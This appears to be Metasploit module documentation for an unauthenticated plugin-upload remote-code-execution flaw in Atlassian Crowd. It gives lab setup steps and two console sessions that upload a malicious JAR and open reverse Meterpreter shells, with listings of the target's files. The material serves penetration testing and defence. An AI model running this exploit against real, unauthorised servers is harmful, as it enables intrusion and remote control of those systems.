## Vulnerable Application

Atlassian Crowd 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5, and 3.4.x prior to 3.4.4
had an incorrect installation of the pdkinstall development plugin, which allows unauthenticated remote attackers to upload and install
arbitrary plugins on vulnerable Atlassian Crowd and Atlassian Crowd Data Center installations via a POST request to the
`/<crowd install base>/admin/uploadplugin.action` page.

Successful exploitation results in remote code execution as the user running the Atlassian Crowd server.

To set up a vulnerable Windows 10 installation:
1. Grab a copy of Windows, any version will do but I tested on Windows 10.
1. Grab a copy of the 3.0.3 version of Atlassian Crowd from https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.0.3.zip
1. Grab a copy of the Java 8 JDK from https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-windows-i586-14_jan_2020.zip
1. Unzip the JDK to a target directory.
1. Edit `JAVA_HOME` environment variable and set it to the location where you extracted the Java 8 JDK.
1. Update the `PATH` environment variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
1. Extract the Atlassian Crowd zip.
1. Edit the `atlassian-crowd-3.0.3\apache-tomcat\bin\catalina.bat` file and remove all the `-Djava.endorsed.dirs` options.
1. Run `start_crowd.bat`
1. After a few minutes browse to `http://localhost:8095/crowd/` and click the blue `Set Up Crowd` button to do a new install.
1. Use the default settings, including using the embedded database.
1. Browse to `http://localhost:8095/crowd/admin/uploadplugin.action`
1. *Verify* a 400 error message stating that the page requires a `POST` request is shown.


To set up a vulnerable 3.2.1 JDK 8 Docker image:
1. `sudo docker volume create --name crowdVolume`
1. `sudo docker run -v crowdVolumeddd:/var/atlassian/application-data/crowd --name="crowd3.2.1" -d -p 8095:8095 atlassian/crowd:3.2.1-jdk8`
1. Wait for install to finish then browse to `http://localhost:8095/`.
1. Click the blue `Set Up Crowd` button to do a new install.
1. If the Docker image crashes at this point, increase the amount of memory allocated towards it. Java requires a fair bit of memory.
1. Use the default settings, including using the embedded database.
1. Browse to `http://localhost:8095/crowd/admin/uploadplugin.action`
1. *Verify* a 400 error message stating that the page requires a `POST` request is shown.

## Verification Steps

1. Follow the steps in `Vulnerable Application`
1. `use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce`
1. Set `RHOST` to the target IP
1. Set `LHOST` to your local IP
1. `exploit`
1. You should get a shell back as the user running the Atlassian Crowd application.

## Options

## Scenarios

### Atlassian Crowd 3.0.3 on Windows 10 20H2
```
msf6 > use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set RHOSTS 192.168.224.204
RHOSTS => 192.168.224.204
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set LHOST 192.168.224.128
LHOST => 192.168.224.128
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options

Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.224.204  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8095             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /crowd/          yes       The base URI to Atlassian Cloud
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.224.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending a test request to try install an invalid plugin to see if the server is vulnerable...
[+] The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating its vulnerable!
[*] Generating a malicious JAR plugin...
[*] Uploading the malicious JAR plugin...
[*] Sending stage (58082 bytes) to 192.168.224.204
[*] Meterpreter session 1 opened (192.168.224.128:4444 -> 192.168.224.204:53871) at 2021-07-30 11:56:38 -0500

meterpreter > getuid
Server username: test
meterpreter > pwd
C:\Users\test\Desktop\atlassian-crowd-3.0.3
meterpreter >
```

### Atlassian Cloud 3.2.1 Linux Docker Image
```
msf6 > use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options

Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8095             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /crowd/          yes       The base URI to Atlassian Crowd
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > check

[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] 127.0.0.1:8095 - The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!
[*] Generating a malicious JAR plugin...
[*] Uploading the malicious JAR plugin...
[*] Sending stage (58082 bytes) to 172.18.0.2
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:39316) at 2021-08-02 10:56:47 -0500

meterpreter > sysinfo
Computer    : 3fc6d7283aaa
OS          : Linux 5.8.0-63-generic (amd64)
Meterpreter : java/linux
meterpreter > getuid
Server username: crowd
meterpreter > pwd
/opt/atlassian/crowd
meterpreter > ls
Listing: /opt/atlassian/crowd
=============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100444/r--r--r--  1254   fil   2018-05-09 05:36:38 -0500  README.txt
40554/r-xr-xr--   4096   dir   2021-07-13 01:52:10 -0500  apache-tomcat
100444/r--r--r--  252    fil   2018-05-09 05:36:38 -0500  build.bat
100444/r--r--r--  650    fil   2018-05-09 05:36:38 -0500  build.properties
100554/r-xr-xr--  204    fil   2018-05-09 05:36:38 -0500  build.sh
100444/r--r--r--  2847   fil   2018-05-09 05:36:38 -0500  build.xml
40554/r-xr-xr--   4096   dir   2018-05-09 06:01:28 -0500  client
40554/r-xr-xr--   4096   dir   2021-07-13 01:52:13 -0500  crowd-openidclient-webapp
40554/r-xr-xr--   4096   dir   2021-07-13 01:52:14 -0500  crowd-openidserver-webapp
40554/r-xr-xr--   4096   dir   2021-07-13 01:52:13 -0500  crowd-webapp
40776/rwxrwxrw-   4096   dir   2021-07-30 17:03:57 -0500  database
40554/r-xr-xr--   4096   dir   2021-07-13 01:52:09 -0500  etc
40554/r-xr-xr--   32768  dir   2021-07-13 01:52:15 -0500  licenses
100444/r--r--r--  407    fil   2018-05-09 05:36:38 -0500  start_crowd.bat
100554/r-xr-xr--  324    fil   2018-05-09 05:36:38 -0500  start_crowd.sh
100444/r--r--r--  98     fil   2018-05-09 05:36:38 -0500  stop_crowd.bat
100554/r-xr-xr--  71     fil   2018-05-09 05:36:38 -0500  stop_crowd.sh

meterpreter >
```
